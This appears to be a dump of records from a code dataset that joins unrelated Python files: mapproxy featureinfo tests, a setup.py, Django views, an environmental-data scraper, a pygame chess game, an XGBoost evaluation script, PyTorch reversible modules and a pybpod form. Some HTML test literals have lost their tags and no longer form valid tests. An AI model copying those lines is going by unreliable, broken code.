XSLTransformer(self.xsl_script)\n doc = t.transform(XMLFeatureInfoDoc.combine([\n XMLFeatureInfoDoc(x) for x in\n [b'<a><b>ab</b></a>',\n b'<a><b>ab1</b><b>ab2</b><b>ab3</b></a>',\n b'<a><b>ab1</b><c>ac</c><b>ab2</b></a>',\n ]]))\n eq_(strip_whitespace(doc.as_string()),\n strip_whitespace(b'''\n <root>\n <foo>ab</foo>\n <foo>ab1</foo><foo>ab2</foo><foo>ab3</foo>\n <foo>ab1</foo><foo>ab2</foo>\n </root>'''))\n eq_(doc.info_type, 'xml')\n\n\nclass TestXMLFeatureInfoDocs(object):\n def test_as_string(self):\n input_tree = etree.fromstring('<root></root>')\n doc = XMLFeatureInfoDoc(input_tree)\n eq_(strip_whitespace(doc.as_string()),\n b'<root/>')\n\n def test_as_etree(self):\n doc = XMLFeatureInfoDoc('<root>hello</root>')\n eq_(doc.as_etree().getroot().text, 'hello')\n\n def test_combine(self):\n docs = [\n XMLFeatureInfoDoc('<root><a>foo</a></root>'),\n XMLFeatureInfoDoc('<root><b>bar</b></root>'),\n XMLFeatureInfoDoc('<other_root><a>baz</a></other_root>'),\n ]\n result = XMLFeatureInfoDoc.combine(docs)\n\n eq_(strip_whitespace(result.as_string()),\n strip_whitespace(b'<root><a>foo</a><b>bar</b><a>baz</a></root>'))\n eq_(result.info_type, 'xml')\n\n\nclass TestXMLFeatureInfoDocsNoLXML(object):\n def setup(self):\n from mapproxy import featureinfo\n self.old_etree = featureinfo.etree\n featureinfo.etree = None\n def teardown(self):\n from mapproxy import featureinfo\n featureinfo.etree = self.old_etree\n\n def test_combine(self):\n docs = [\n XMLFeatureInfoDoc(b'<root><a>foo</a></root>'),\n XMLFeatureInfoDoc(b'<root><b>bar</b></root>'),\n XMLFeatureInfoDoc(b'<other_root><a>baz</a></other_root>'),\n ]\n result = XMLFeatureInfoDoc.combine(docs)\n\n eq_(b'<root><a>foo</a></root>\\n<root><b>bar</b></root>\\n<other_root><a>baz</a></other_root>',\n result.as_string())\n eq_(result.info_type, 'text')\n\nclass TestHTMLFeatureInfoDocs(object):\n def test_as_string(self):\n input_tree = html.fromstring('<p>Foo')\n doc = HTMLFeatureInfoDoc(input_tree)\n assert b'<body><p>Foo</p></body>' in strip_whitespace(doc.as_string())\n\n def test_as_etree(self):\n doc = HTMLFeatureInfoDoc('<p>hello</p>')\n eq_(doc.as_etree().find('body/p').text, 'hello')\n\n def test_combine(self):\n docs = [\n HTMLFeatureInfoDoc(b'<html><head><title>Hello<body><p>baz</p><p>baz2'),\n HTMLFeatureInfoDoc(b'<p>foo</p>'),\n HTMLFeatureInfoDoc(b'<body><p>bar</p></body>'),\n ]\n result = HTMLFeatureInfoDoc.combine(docs)\n assert b'<title>Hello' in result.as_string()\n assert (b'

baz

baz2

foo

bar

' in\n result.as_string())\n eq_(result.info_type, 'html')\n\n def test_combine_parts(self):\n docs = [\n HTMLFeatureInfoDoc('

foo

'),\n HTMLFeatureInfoDoc('

bar

'),\n HTMLFeatureInfoDoc('Hello<body><p>baz</p><p>baz2'),\n ]\n result = HTMLFeatureInfoDoc.combine(docs)\n\n assert (b'<body><p>foo</p><p>bar</p><p>baz</p><p>baz2</p></body>' in\n result.as_string())\n eq_(result.info_type, 'html')\n\nclass TestHTMLFeatureInfoDocsNoLXML(object):\n def setup(self):\n from mapproxy import featureinfo\n self.old_etree = featureinfo.etree\n featureinfo.etree = None\n def teardown(self):\n from mapproxy import featureinfo\n featureinfo.etree = self.old_etree\n\n def test_combine(self):\n docs = [\n HTMLFeatureInfoDoc(b'<html><head><title>Hello<body><p>baz</p><p>baz2'),\n HTMLFeatureInfoDoc(b'<p>foo</p>'),\n HTMLFeatureInfoDoc(b'<body><p>bar</p></body>'),\n ]\n result = HTMLFeatureInfoDoc.combine(docs)\n\n eq_(b\"<html><head><title>Hello<body><p>baz</p>\"\n b\"<p>baz2\\n<p>foo</p>\\n<body><p>bar</p></body>\",\n result.as_string())\n eq_(result.info_type, 'text')\n","sub_path":"mapproxy/test/unit/test_featureinfo.py","file_name":"test_featureinfo.py","file_ext":"py","file_size_in_byte":6337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"72595543","text":"# Always prefer setuptools over distutils\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nwith open('requirements.txt') as f:\n required = f.read().splitlines()\n\nsetup(\n name='shapley-effects',\n version='0.1',\n description='Estimation of Shapley effects for Sensitivity Analysis of Model Output.',\n long_description=open('README.md').read(),\n url='https://gitlab.com/CEMRACS17/shapley-effects',\n author='Nazih BENOUMECHIARA & Kevin ELIE-DIT-COSAQUE',\n author_email = 'nazih.benoumechiara@gmail.com',\n license='MIT',\n keywords=['sensitivity analysis', 'shapley', 'effects', 'depedencies'],\n packages=['shapley'],\n install_requires=required\n)","sub_path":"pypi_install_script/shapley-effects-0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"247142518","text":"from django.shortcuts import render_to_response, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import Http404\nfrom django.conf import settings\n\nimport os\nimport random\n\nfrom ppt.models import *\nfrom ppt.forms import *\n\n\n#########\n# General\n#########\n\n\ndef homepage(request):\n user = request.user\n\n return render_to_response('ppt/index.html',\n { 'user': user,\n },\n context_instance=RequestContext(request))\n\n\n\n#########\n# Users\n#########\n\n\n@login_required\ndef user_list(request):\n users = User.objects.all()\n \n return render_to_response('ppt/user_list.html',\n {'users': users}, context_instance=RequestContext(request)\n )\n\n\n@login_required\ndef user_view(request, username=False):\n if not username:\n username = request.user\n\n user = get_object_or_404(User, username=username)\n \n ppts = Ppt.objects.filter(user_id=user.id).order_by('pk')\n \n return render_to_response('ppt/user_view.html',\n { 'user': user,\n 'ppts': ppts\n },\n context_instance=RequestContext(request)\n )\n\n\n##############\n# PowerPoints\n###############\n\n@login_required\ndef user_ppt_view(request, username, ppt_id):\n user = get_object_or_404(User, username=username)\n ppt = Ppt.objects.get(user_id=user.id, id=ppt_id)\n \n return render_to_response('ppt/user_ppt_view.html',\n { 'user': user,\n 'ppt': ppt,\n },\n context_instance=RequestContext(request)\n )\n\n\n\n# Note that this both uploads new files and allows edits.\n@login_required\ndef user_ppt_edit(request, username, ppt_id=False):\n user = User.objects.get(username=request.user)\n\n print(ppt_id)\n\n if not ppt_id == False:\n ppt = get_object_or_404(Ppt, id=ppt_id)\n else:\n ppt = Ppt(user=user, title='', description='')\n\n if request.method == 'POST':\n pptForm = PptForm(request.POST, request.FILES, instance=ppt)\n if pptForm.is_valid():\n ppt = pptForm.save()\n return HttpResponseRedirect(ppt.get_absolute_url())\n else:\n pptForm = PptForm(instance=ppt)\n \n return render_to_response('ppt/user_ppt_edit.html',\n {'user': user, 'form': pptForm},\n context_instance=RequestContext(request)\n )\n\n\n#########\n# Units\n#########\n\n@login_required\ndef unit_list(request):\n units = PptUnit.objects.all()\n \n return render_to_response('ppt/unit_list.html',\n {'units': units}, context_instance=RequestContext(request)\n )\n\n\n@login_required\ndef unit_view(request, unit_id):\n unit = get_object_or_404(PptUnit, id=unit_id)\n \n return render_to_response('ppt/unit_view.html',\n {'unit': unit}, context_instance=RequestContext(request)\n )\n\n\n\n","sub_path":"ppt/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653087069","text":"'''\n获取排放废气的公司的详细信息\n'''\nimport pyamf\nfrom pyamf.flex import messaging\nimport uuid\nimport requests\nimport datetime\nfrom pyamf import remoting\nfrom pyamf.flex import messaging\nfrom pyquery import PyQuery as pq\nfrom contextlib import closing\n\nfrom t3c.manager.db import DB\nfrom common_class import GetGasCommpanyData, ParseFlash\n\nclass GetGasCompanyDetial(object):\n\n def __init__(self):\n super(GetGasCompanyDetial, self).__init__()\n self.url = 'http://111.75.227.207:9180/eipp/messagebroker/amf'\n self.session = requests.Session()\n self.db = DB()\n\n def get_company_detial(self, company_id):\n message = ['getEnterpriseReportDetail', '', 'EnterpriseBasService']\n body = ['2017']\n\n body.insert(0, company_id)\n resp = ParseFlash().amf(message, body, self.url)\n\n if resp.ok:\n resp_msg = remoting.decode(resp.content).bodies[0][1]\n content = list(resp_msg.body.body)\n\n return content[0]\n\n def update_insert(self, insert, update, contents):\n with closing(self.db.engine.connect()) as cn:\n res = cn.execute(update, contents)\n\n if not res.rowcount:\n cn.execute(insert, contents)\n\n def save_detial(self, datas):\n insert_sql = 'INSERT INTO \"plant_app_tcx\".\"tb_enterprise\" (qy_corporation,qy_id,qy_address,'\\\n 'province_id,qy_link_phone,qy_wrylx,qy_name,qy_industry,qy_auto_monitor_operation_style)'\\\n 'VALUES (%(qy_corporation)s,%(qy_id)s,%(qy_address)s,%(province_id)s,%(qy_link_phone)s,'\\\n '%(qy_wrylx)s,%(qy_name)s,%(qy_industry)s,%(qy_auto_monitor_operation_style)s);'\n\n update_sql = 'UPDATE \"plant_app_tcx\".\"tb_enterprise\" SET qy_corporation=%(qy_corporation)s,'\\\n 'qy_address=%(qy_address)s,qy_link_phone=%(qy_link_phone)s,qy_wrylx=%(qy_wrylx)s,qy_name=%(qy_name)s,'\\\n 'qy_industry=%(qy_industry)s,qy_auto_monitor_operation_style=%(qy_auto_monitor_operation_style)s '\\\n 'WHERE ( qy_id=%(qy_id)s AND province_id=%(province_id)s);'\n\n for data in datas:\n try:\n con = {}\n con['qy_name'] = data['enterPriseName']\n con['qy_corporation'] = data['legalPerson']\n con['qy_link_phone'] = data['officePhone']\n con['qy_address'] = data['address']\n con['qy_industry'] = data['industryTypeName']\n con['qy_wrylx'] = data['monitorTypeName']\n con['province_id'] = int(36000000)\n con['qy_id'] = str(int(data['enterPriseId']))\n con['qy_auto_monitor_operation_style'] = '自动监测和手工监测'\n\n self.update_insert(insert_sql, update_sql, con)\n\n except Exception as e:\n print(e)\n\n def save_all_company_detial(self):\n company_id_list = GetGasCommpanyData().all_gas_company_name_company_id()\n company_detial_lists = []\n\n for item in company_id_list:\n company_detial_lists.append(self.get_company_detial(item[1]))\n\n self.save_detial(company_detial_lists)\n\nif __name__ == '__main__':\n t = GetGasCompanyDetial()\n t.save_all_company_detial()\n","sub_path":"江西环保局各排废气的厂污染数据抓取/江西环保l/get_gas_company_info.py","file_name":"get_gas_company_info.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"338169672","text":"import leviChess as lc\n\n##initialization \n\nBOARD_OFFSET_X = 79\nBOARD_OFFSET_Y = 79\nSPRITE_SIZE = 79\n\n#dictionary of every square coordinate, as strings. e.g. \"e4\"\n#from black POV\nboard = {chr(72 - j) + str(i + 1):[(BOARD_OFFSET_X + (j * SPRITE_SIZE), BOARD_OFFSET_Y + (i * SPRITE_SIZE))] for i in range(8) for j in range(8)}\nprint(board)\n\n#lc.init_graphics()\nlc.pygame.init()\nsize = width, height = 768, 768 #screen size\nscreen = lc.pygame.display.set_mode(size) #create screen\nlc.pygame.display.set_caption('Levi\\'s Chess')\nlc.pygame.mouse.set_visible(1)\n\n#load board asset\nbackground = lc.pygame.image.load(\"assets/chess_board.png\")\nbackground_rect = background.get_rect()\n\n#store all pieces in list\npieces = []\n#instantiate pieces, add to piece list\npieces.extend([lc.Piece(\"white\", \"pawn\", chr(65 + num) + str(2), board) for num in range(8)])\npieces.extend([lc.Piece(\"black\", \"pawn\", chr(65 + num) + str(7), board) for num in range(8)])\npieces.extend([lc.Piece(\"white\", \"rook\", chr(65 + (num * 7)) + str(1), board) for num in range(2)])\npieces.extend([lc.Piece(\"black\", \"rook\", chr(65 + (num * 7)) + str(8), board) for num in range(2)])\npieces.extend([lc.Piece(\"white\", \"knight\", chr(65 + ((num * 5) + 1)) + str(1), board) for num in range(2)])\npieces.extend([lc.Piece(\"black\", \"knight\", chr(65 + ((num * 5) + 1)) + str(8), board) for num in range(2)])\npieces.extend([lc.Piece(\"white\", \"bishop\", chr(65 + ((num * 3) + 2)) + str(1), board) for num in range(2)])\npieces.extend([lc.Piece(\"black\", \"bishop\", chr(65 + ((num * 3) + 2)) + str(8), board) for num in range(2)])\npieces.extend([lc.Piece(\"white\", \"queen\", \"D1\", board)])\npieces.extend([lc.Piece(\"black\", \"queen\", \"D8\", board)])\npieces.extend([lc.Piece(\"white\", \"king\", \"E1\", board)])\npieces.extend([lc.Piece(\"black\", \"king\", \"E8\", board)])\n\n#white to move first\nturn = 0\n#true when a piece has been clicked already, removes need for nested loops\npiece_selected = 0\n\n#create container for sprites\nallsprites = lc.pygame.sprite.RenderPlain(pieces)\n\n#init gameclock to spare cpu usage\nclock = lc.pygame.time.Clock()\n\n#main loop\nwhile 1:\n\tclock.tick(60)\n\n\t#this will restrict moveable pieces based on turn\n\tif turn == 0:\n\t\tto_move = \"white\"\n\telif turn == 1:\n\t\tto_move = \"black\"\n\n\t#render board\n\tscreen.blit(background, background_rect)\n\n\t#draw all sprites (TODO: ...that aren't captured)\n\tallsprites.draw(screen)\n\n\t#update display\n\tlc.pygame.display.flip()\n\n\t#get updated event queue\n\tev = lc.pygame.event.get()\n\n\t#select piece with a click, move the piece with the next click\n\tfor event in ev:\n\t\t#if a piece is clicked and none are currently selected\n\t\tif event.type == lc.pygame.MOUSEBUTTONDOWN and piece_selected == 0:\n\t\t\t#get click position\n\t\t\tpos = lc.pygame.mouse.get_pos()\n\n\t\t\t# get a list of all sprites that are under the mouse cursor\n\t\t\tclicked_sprites = [s for s in pieces if s.rect.collidepoint(pos)]\n\t\t\tif clicked_sprites:\n\t\t\t\t#if the piece has been clicked and it is the right team's turn\n\t\t\t\tif clicked_sprites[0].color == to_move:\n\n\t\t\t\t\t#enlarge selected piece for emphasis\n\t\t\t\t\tclicked_sprites[0].image = lc.pygame.transform.smoothscale(\\\n\t\t\t\t\t\tclicked_sprites[0].image, (80, 80))\n\n\t\t\t\t\t#recenter enlarged sprite\n\t\t\t\t\tclicked_sprites[0].rect = clicked_sprites[0].rect.move(\\\n\t\t\t\t\t\t(-12, -12))\n\n\t\t\t\t\t#next click will move the piece instead of selecting another sprite\n\t\t\t\t\tpiece_selected = 1\n\t\t\t\t\tprint(clicked_sprites[0].image)\n\n\t\t\t\t#if piece selected out of turn\n\t\t\t\telif clicked_sprites[0].color != to_move:\t\n\t\t\t\t\tprint(\"wrong turn\")\n\t\t\t\t\t\n\n\n\t\t\tprint(\"1st click selected \", clicked_sprites, piece_selected)\n\n\t\t#if a piece has been selected and needs to move\n\t\telif event.type == lc.pygame.MOUSEBUTTONDOWN and piece_selected == 1:\n\t\t\t#reset piece selection for next click\n\t\t\tpiece_selected = 0\n\n\t\t\t#get new click pos\n\t\t\tpos2 = lc.pygame.mouse.get_pos()\n\t\t\tprint(\"pos2\", pos2)\n\t\t\t#check if another piece was clicked on, if it's the same color, \n\t\t\t#select it instead of moving (unless king is castling)\n\t\t\t# get a list of all sprites that are under the mouse cursor\n\t\t\tnew_clicked_sprites = [p for p in pieces if p.rect.collidepoint(pos2)]\n\t\t\tprint(new_clicked_sprites)\n\t\t\t\n\t\t\t#logic for castling must be handled separately\n\t\t\t# if ((clicked_sprites[0].rank == \"king\" and new_clicked_sprites[0].rank == \"rook\")\\\n\t\t\t# and (clicked_sprites[0].color == to_move and new_clicked_sprites[0].color == to_move):\n\t\t\t# \tprint(\"castle attempted, no logic yet\")\n\t\t\t\n\t\t\t#if another piece is clicked on (instead of open square)\n\t\t\tif new_clicked_sprites:\n\n\t\t\t\t#if the player tries to move to a square they already occupy\n\t\t\t\tif new_clicked_sprites[0].color == to_move:\n\t\t\t\t\t#just select that new piece\n\t\t\t\t\t#enlarge selected piece for emphasis\n\t\t\t\t\tnew_clicked_sprites[0].image = lc.pygame.transform.smoothscale(\\\n\t\t\t\t\tnew_clicked_sprites[0].image, (80, 80))\n\n\t\t\t\t\t#unenlarge the old piece\n\t\t\t\t\tclicked_sprites[0].image = lc.pygame.transform.smoothscale(\\\n\t\t\t\t\tclicked_sprites[0].image, (60, 60))\n\n\t\t\t\t\t#recenter enlarged sprite\n\t\t\t\t\tnew_clicked_sprites[0].rect = new_clicked_sprites[0].rect.move(\\\n\t\t\t\t\t\t(-12, -12))\n\n\t\t\t\t\t#next click will move the piece instead of selecting another sprite\n\t\t\t\t\tpiece_selected = 1\n\t\t\t\t\tprint(new_clicked_sprites[0].image)\n\t\t\t\n\t\t\t#if an open square is clicked\n\t\t\telse:\n\t\t\t\t#un-enlarge piece for placement\n\t\t\t\tclicked_sprites[0].image, clicked_sprites[0].rect = lc.load_image(\\\n\t\t\t\t\tclicked_sprites[0].color + \"_\" + clicked_sprites[0].rank + \".png\", -1)\n\n\t\t\t\t#get the square that was clicked on \n\t\t\t\tnew_square = resolveSquare(pos2)\n\t\t\t\tprint(new_square)\n\t\t\t\t#pull the corresponding coordinate from board dict, render piece there\n\t\t\t\tclicked_sprites[0].rect.topleft = board[new_square][0]\n\t\t\t\t\n\t\t\t\t#let another piece get selected \n\t\t\t\tprint(\"second click\", piece_selected)\n\n\t\t\t\t#erase list of clicked sprites\n\t\t\t\tclicked_sprites = []\n\t\t\t\tprint(\"sprites selected after 2nd click \", clicked_sprites)\n\n\t\t\t\t#change turns\n\t\t\t\tturn = turn ^ 1\n\n\t#erase queue to make way for fresh clicks\n\tlc.pygame.event.clear()\n\t\n\tdef resolveSquare(mouse_click):\n\t\tselectedRow = lc.math.floor(mouse_click[1] / 79)\n\t\tselectedCol = lc.math.floor(mouse_click[0] / 79) - 1\n\t\t#convert column to character\n\t\tselectedCol = chr(72 -selectedCol)\n\t\tnew_square = selectedCol + str(selectedRow)\n\t\t#return square\n\t\tprint(mouse_click)\n\t\tprint(new_square)\n\t\treturn new_square","sub_path":"chess-game.py","file_name":"chess-game.py","file_ext":"py","file_size_in_byte":6328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"500153981","text":"# coding=utf-8\n\n\ndef make_type_consistent(s1, s2):\n \"\"\"If both objects aren't either both string or unicode instances force them to unicode\"\"\"\n if isinstance(s1, str) and isinstance(s2, str): return s1, s2\n elif isinstance(s1, unicode) and isinstance(s2, unicode): return s1, s2\n else: return unicode(s1), unicode(s2)\n\n\ndef similarity(a,b):\n import difflib\n from constants import no_name_value\n if len(a)==0 or len(b)==0:\n return no_name_value\n a,b = make_type_consistent(a,b)\n a,b = a.lower(), b.lower()\n match_size = sum([m.size for m in difflib.SequenceMatcher(a=a, b=b, autojunk=False).get_matching_blocks()])*1.0\n longer_size, shorter_size = (len(b),len(a)) if len(a)<len(b) else ((len(a),len(b)))\n longer_size = shorter_size if (longer_size/1.5)<=shorter_size else longer_size/1.5\n# return match_size/(longer_size+shorter_size)*2\n return match_size/shorter_size\n\n\ndef change_ext(fn, new_ext):\n import os\n base = os.path.splitext(fn)[0]\n if not new_ext.startswith('.'):\n new_ext = '.' + new_ext\n return base + new_ext\n\n\ndef add_suffix(fn, suf):\n import os\n base, ext = os.path.splitext(fn)\n return base + suf + ext\n\n\ndef costs(start_time):\n import datetime\n dnow = datetime.datetime.now()\n delta = dnow - start_time\n delta_total_seconds_int = int(delta.total_seconds())\n return 'now = %s, costs = %d days %02d:%02d:%02d = %d seconds' % (dnow.strftime('%Y-%m-%d %H:%M:%S'),\n delta_total_seconds_int / 3600 / 24,\n delta_total_seconds_int / 3600 % 24,\n delta_total_seconds_int / 60 % 60,\n delta_total_seconds_int % 60,\n delta_total_seconds_int)\n","sub_path":"open_data_analysis/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"169163402","text":"#!/usr/bin/python\n\nimport pandas as pd\nfrom sklearn import model_selection\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import *\nfrom keras.utils import to_categorical\nimport pickle\nimport json\nimport xgboost as xgb\nimport time\nimport numpy as np\nimport sys\nimport os\nsys.path.insert(0, '/user-home/.scripts/common-helpers')\nimport published_model_util\nimport numpy as np\n\n# define variables\nargs={\"threshold\": {\"metric\": \"areaUnderROC\", \"min_value\": 0.65, \"mid_value\": 0.85}, \"published\": \"false\", \"dataset\": \"/datasets/banking_loans_default_eval.csv\"}\nmodel_path = os.getenv(\"DSX_PROJECT_DIR\")+\"/models/XGBDefault/1/model\"\nif(False):\n input_data = args.get(\"dataset\")\nelse:\n input_data = os.getenv(\"DSX_PROJECT_DIR\")+args.get(\"dataset\")\nuser_id = os.environ['DSX_USER_ID']\nproject_name = os.environ['DSX_PROJECT_NAME']\n\n\n# load the input data\ndf1 = pd.read_csv(input_data)\n\ny_true = df1[[u'DEFAULT']].values.flatten()\nX = df1[[u'NUM_CARD_APPLS', u'CUST_ACQ_YR', u'NUM_PRODUCTS', u'HOME_BRANCH_CTY', u'AVG_CARD_BAL', u'CLNTS_IN_HSHLD', u'SALESPERSON_ID', u'CREDIT_SCORE', u'GENDER', u'AVG_MORTGAGE_PYMNT', u'NUM_LATE_PYMNTS', u'SATISFACTION', u'BANKRUPTCY_LAST_7YRS', u'INIT_MORTG_AMT', u'NUM_ADDR_CHNGS', u'EQUITIES_BAL', u'HOME_BRANCH_ST', u'AVG_CASH_BAL', u'CHURN', u'AGE_RNG', u'CUST_TYPE']]\n\nserialization = \"xgboost\"\n\n\npublished_path = ''\n# if published use model path\nif(args.get('published').lower() == 'true'):\n copy_result = json.loads(published_model_util.copy_model(project_name, \"XGBDefault\"))\n if(copy_result['code'] == 200):\n model_path = copy_result['path'] + \"/model\"\n published_path = copy_result['path']\n else:\n raise Exception('Unable to evaluate published model: ' + copy_result['description'])\n\n# load the model from disk \nif serialization == 'xgboost':\n X = xgb.DMatrix(X.as_matrix())\n loaded_model = xgb.Booster()\n loaded_model.load_model(model_path)\nelse:\n loaded_model = xgboost.load(open(model_path, 'rb'))\n\n# predictions\ny_pred = loaded_model.predict(X)\ny_classes = pd.DataFrame(y_pred).apply(np.argmax, axis=1)\n\nif(len(y_pred.shape) == 1):\n y_pred = y_pred.round().astype(int)\n\n# Create Evalutation JSON\nevaluation = dict()\nevaluation[\"metrics\"] = dict()\n\n# Classification Metrics\nthreshold={u'metric': 'areaUnderROC', u'min_value': 0.65, u'mid_value': 0.85}\n\nif (len(y_true.shape)==1):\n y_true_1d = y_true\n y_true_2d = to_categorical(y_true)\n\nelse:\n y_true_1d = np.argmax(y_true,axis=1)\n y_true_2d = y_true\n\nif (len(y_pred.shape)==1):\n y_pred_1d = y_pred\n y_pred_2d = to_categorical(y_pred)\n\nelse:\n y_pred_1d = np.argmax(y_pred,axis=1)\n y_pred_2d = y_pred\n\n\nevaluation[\"metrics\"][\"accuracyScore\"] = accuracy_score(y_true_1d, y_pred_1d)\nevaluation[\"metrics\"][\"precisionScore\"] =precision_score(y_true_1d,y_pred_1d, average=\"weighted\")\nevaluation[\"metrics\"][\"recallScore\"] = recall_score(y_true_1d,y_pred_1d, average=\"weighted\")\nevaluation[\"metrics\"][\"areaUnderROC\"] = roc_auc_score(y_true_2d,y_pred_2d)\nevaluation[\"metrics\"][\"threshold\"] = threshold\n\nif(evaluation[\"metrics\"][threshold.get('metric','INVALID_METRIC')] >= threshold.get('mid_value', 0.70)):\n evaluation[\"performance\"] = \"good\"\nelif(evaluation[\"metrics\"][threshold.get('metric','INVALID_METRIC')] <= threshold.get('min_value', 0.25)):\n evaluation[\"performance\"] = \"poor\"\nelse:\n evaluation[\"performance\"] = \"fair\"\n\nevaluation[\"modelName\"] = \"XGBDefault\"\nevaluation[\"startTime\"] = int(time.time())\n\nif(args.get('published').lower() == 'true'):\n evaluations_file_path = published_path +'/evaluations.json'\n evaluation[\"deployment\"] = \"default\"\nelse:\n evaluations_file_path = os.getenv(\"DSX_PROJECT_DIR\") + '/models/' + \"XGBDefault\" + '/' + \"latest\" + '/evaluations.json'\n evaluation[\"modelVersion\"] = \"latest\"\n\nif(os.path.isfile(evaluations_file_path)):\n current_evaluations = json.load(open(evaluations_file_path))\nelse:\n current_evaluations = []\ncurrent_evaluations.append(evaluation)\n\nwith open(evaluations_file_path, 'w') as outfile:\n json.dump(current_evaluations, outfile, indent=4, sort_keys=True)\n\n#copy to dir with helper function\nif (len(published_path) > 0):\n published_model_util.update_evaluation_metrics(project_name, \"XGBDefault\")\n published_model_util.delete_temp_model()","sub_path":"FSS_DEMO/scripts/XGBDefaultEval.py","file_name":"XGBDefaultEval.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"83042820","text":"import torch\nfrom torch import nn\nfrom .functional import reversible_block_forward\n\n\nclass LSHSelfAttention(nn.Module):\n def __init__(self):\n super(LSHAttention, self).__init__()\n\n def forward(self, x):\n return\n\n\nclass ChunkedFeedForward(nn.Module):\n def __init__(self):\n super(ChunkedFeedForward, self).__init__()\n\n def forward(self, x):\n return\n\n\nclass ReversibleBlock(nn.Module):\n # TODO check that it is contained in a reversible container or has access to an output stack in some other way?\n def __init__(self, f, g):\n super(ReversibleBlock, self).__init__()\n self.f = f\n self.g = g\n self.output_stack = None\n\n def forward(self, x):\n # NOTE input channel dim has to be divisible by two\n if self.output_stack is None:\n raise ValueError(\"output_stack of {} has to be set to a stack shared between reversible layers.\".format(self))\n return reversible_block_forward(self.f, self.g, self.output_stack, x, preserve_rng_state=True, dim=1)\n\n\nclass ReversibleSequential(nn.Sequential):\n def __init__(self, *args, output_stack=[]):\n super(ReversibleSequential, self).__init__(*args)\n self.output_stack = output_stack\n # TODO first block should not put its input on the stack\n for module in self:\n assert isinstance(module, ReversibleBlock)\n module.output_stack = self.output_stack\n return\n\n def forward(self, x):\n y = super(ReversibleSequential, self).forward(x)\n self.output_stack.append(y)\n return y\n\n\n# TODO norm\nclass ReversibleConvBlock(ReversibleBlock):\n def __init__(self, channels, kernel_size, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', alpha=1., dropout=0.5):\n f = None\n if dropout ==0.0:\n f = nn.Conv2d(\n channels, channels, kernel_size,\n stride=1, padding=padding, dilation=dilation,\n groups=groups, bias=bias, padding_mode=padding_mode\n )\n else:\n f = nn.Sequential(\n nn.Conv2d(\n channels, channels, kernel_size,\n stride=1, padding=padding, dilation=dilation,\n groups=groups, bias=bias, padding_mode=padding_mode\n ),\n nn.Dropout(p=dropout)\n )\n nonl = nn.ELU(alpha=alpha)\n super(ReversibleConvBlock, self).__init__(f, nonl)\n\n\n# TODO norm\n# TODO LSH\nclass ReversibleLSHSelfAttentionBlock(ReversibleBlock):\n def __init__(self):\n attn = LSHSelfAttention()\n # TODO chunked ff\n ff = nn.Sequential()\n super(ReversibleLSHSelfAttentionBlock, self).__init__(attn, ff)\n def forward(self, x):\n return\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, dtype=torch.float):\n super(PositionalEncoding, self).__init__()\n self.dtype = dtype\n\n def forward(self, x):\n b, c, l = x.size()\n d = x.device\n y = torch.arange(l, dtype=self.dtype, device=x.device)\n y = y.expand(b, 1, l)\n y = torch.cat((x, y), 1)\n return y\n\n\nclass OuterConcatenation(nn.Module):\n def __init__(self):\n super(OuterConcatenation, self).__init__()\n\n def forward(self, x):\n b, c, l = x.size()\n x1 = x.unsqueeze(-1)\n x1 = x1.expand(b, c, l, l)\n\n x2 = torch.transpose(x1, -1, -2)\n\n return torch.cat((x1, x2), 1)\n","sub_path":"src/nnicotine/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"539746371","text":"# !/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport logging\n\nimport pyforms as app\n\nfrom pyforms.basewidget import BaseWidget\nfrom pyforms.controls import ControlText\nfrom pyforms.controls import ControlList\nfrom pyforms.controls import ControlButton\nfrom pyforms.controls import ControlCombo\nfrom pyforms.controls import ControlCheckBox\nfrom pyforms.controls import ControlCheckBoxList\nfrom pyforms.controls import ControlEmptyWidget\n\nfrom pybpodgui_plugin.models.subject import Subject\nfrom pybpodgui_api.models.setup import Setup\nfrom pybpodgui_api.exceptions.run_setup import RunSetupError\n\nfrom pybpodgui_plugin.models.setup.board_task import BoardTask\nfrom pybpodgui_plugin.models.session import Session\n\nlogger = logging.getLogger(__name__)\n\n\nclass SubjectSelectPopup(BaseWidget):\n\n def __init__(self, subjectlist, selectedsubjects):\n\n super(SubjectSelectPopup, self).__init__('Add Subjects')\n\n self._ok_btn = ControlButton('OK')\n self._cancel_btn = ControlButton('Cancel', default=self.cancel_evt)\n self._subjectslist = ControlCheckBoxList('Subject List')\n\n self._formset = [\n '',\n ('', '_subjectslist', ''),\n ('', '_ok_btn', '_cancel_btn', ''),\n ''\n ]\n\n for subject in sorted([s for s in subjectlist], key=lambda x: x.name.lower()):\n b = False\n for a in selectedsubjects.value:\n if subject.name == a[0]:\n self._subjectslist += (subject, True)\n b = True\n if b is False:\n self._subjectslist += (subject, False)\n\n def ok_evt(self):\n self.close()\n # self.ok_event(self._subjectslist.value)\n\n def closewidnow(self):\n self.close()\n\n def subjectlist(self):\n return self._subjectslist.items\n\n # THIS IS THE WAY WE CREATE A SIGNAL INSIDE PYBPOD (SCROLL DOWN...)\n def ok_event(self, subjects):\n pass\n\n def cancel_evt(self):\n print('cancel')\n self.close()\n\n\nclass 